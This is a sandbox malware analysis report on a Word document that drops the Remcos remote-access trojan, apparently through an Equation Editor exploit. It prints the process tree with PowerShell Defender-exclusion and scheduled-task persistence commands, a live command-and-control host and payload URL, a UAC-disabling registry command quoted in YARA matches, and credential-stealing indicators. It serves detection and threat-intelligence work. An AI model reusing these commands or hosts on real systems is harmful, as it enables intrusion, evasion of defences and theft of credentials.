Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Offer ZI-0428.doc

Overview

General Information

Sample name:Offer ZI-0428.doc
Analysis ID:1465260
MD5:dde9d7d091ac0cc1d35515d259d8ca6f
SHA1:c6e943143771fc3fd7c2c548f5fddcd6013d9302
SHA256:95be57795b850e5aa098c80a107bafdb581da7653d9b57b8f2d37b89880de224
Tags:doc
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3160 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3240 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • plugman23456.scr (PID: 3396 cmdline: "C:\Users\user\AppData\Roaming\plugman23456.scr" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
        • powershell.exe (PID: 3452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 3520 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • plugman23456.scr (PID: 3704 cmdline: "C:\Users\user\AppData\Roaming\plugman23456.scr" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
          • plugman23456.scr (PID: 4068 cmdline: C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
          • plugman23456.scr (PID: 4080 cmdline: C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\ejlrnu" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
          • plugman23456.scr (PID: 2100 cmdline: C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\odrcnntyd" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
    • EQNEDT32.EXE (PID: 3480 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • taskeng.exe (PID: 3832 cmdline: taskeng.exe {8CF74EAD-4204-4C1F-8614-11C7F9468804} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • znlzneAxBVd.exe (PID: 3908 cmdline: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe MD5: 28F77C9AF8CB3EA886714BBFC8326635)
      • powershell.exe (PID: 3948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 4052 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpE15.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • znlzneAxBVd.exe (PID: 3252 cmdline: "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "antfly50.sytes.net:1980:1", "Assigned name": "sPITTT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BW3KDF", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Offer ZI-0428.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x15e4b:$obj2: \objdata
  • 0x15e61:$obj3: \objupdate
  • 0x15e26:$obj6: \objlink

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              25.2.znlzneAxBVd.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                25.2.znlzneAxBVd.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  25.2.znlzneAxBVd.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4a8:$a1: Remcos restarted by watchdog!
                  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
                  25.2.znlzneAxBVd.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6656c:$str_b2: Executing file:
                  • 0x675ec:$str_b3: GetDirectListeningPort
                  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67118:$str_b7: \update.vbs
                  • 0x66594:$str_b9: Downloaded file:
                  • 0x66580:$str_b10: Downloading file:
                  • 0x66624:$str_b12: Failed to upload file:
                  • 0x675b4:$str_b13: StartForward
                  • 0x675d4:$str_b14: StopForward
                  • 0x67070:$str_b15: fso.DeleteFile "
                  • 0x67004:$str_b16: On Error Resume Next
                  • 0x670a0:$str_b17: fso.DeleteFolder "
                  • 0x66614:$str_b18: Uploaded file:
                  • 0x665d4:$str_b19: Unable to delete:
                  • 0x67038:$str_b20: while fso.FileExists("
                  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
                  25.2.znlzneAxBVd.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x6637c:$s1: CoGetObject
                  • 0x66390:$s1: CoGetObject
                  • 0x663ac:$s1: CoGetObject
                  • 0x70338:$s1: CoGetObject
                  • 0x6633c:$s2: Elevation:Administrator!new:
                  Click to see the 23 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 31.192.235.145, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3240, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49164, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3240, Protocol: tcp, SourceIp: 31.192.235.145, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", ProcessId: 3452, ProcessName: powershell.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\plugman23456.scr, NewProcessName: C:\Users\user\AppData\Roaming\plugman23456.scr, OriginalFileName: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3240, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ProcessId: 3396, ProcessName: plugman23456.scr
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", ProcessId: 3452, ProcessName: powershell.exe
                  Sigma detected: SCR File Write Event
                  Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3240, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", ProcessId: 3520, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", ProcessId: 3520, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Screensaver Binary File Creation
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3240, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3240, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", ProcessId: 3452, ProcessName: powershell.exe
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3452, TargetFilename: C:\Users\user\AppData\Local\Temp\vkidhas2.ame.ps1

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", ProcessId: 3520, ProcessName: schtasks.exe

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\plugman23456.scr, ProcessId: 3704, TargetFilename: C:\ProgramData\remcos\logs.dat

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://sinopecllc.top/plug.scriiC:Avira URL Cloud: Label: malware
                  Source: antfly50.sytes.netAvira URL Cloud: Label: malware
                  Source: http://sinopecllc.top/plug.scrAvira URL Cloud: Label: malware
                  Source: http://sinopecllc.top/plug.scrC:Avira URL Cloud: Label: malware
                  Source: http://sinopecllc.top/plug.scrjAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scrAvira: detection malicious, Label: HEUR/AGEN.1362875
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeAvira: detection malicious, Label: HEUR/AGEN.1362875
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrAvira: detection malicious, Label: HEUR/AGEN.1362875
                  Found malware configuration
                  Source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "antfly50.sytes.net:1980:1", "Assigned name": "sPITTT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BW3KDF", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for submitted file
                  Source: Offer ZI-0428.docReversingLabs: Detection: 47%
                  Source: Offer ZI-0428.docVirustotal: Detection: 40%Perma Link
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 3704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scrJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,21_2_00404423
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,25_2_00433837
                  Source: plugman23456.scr, 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_21924a3f-1

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
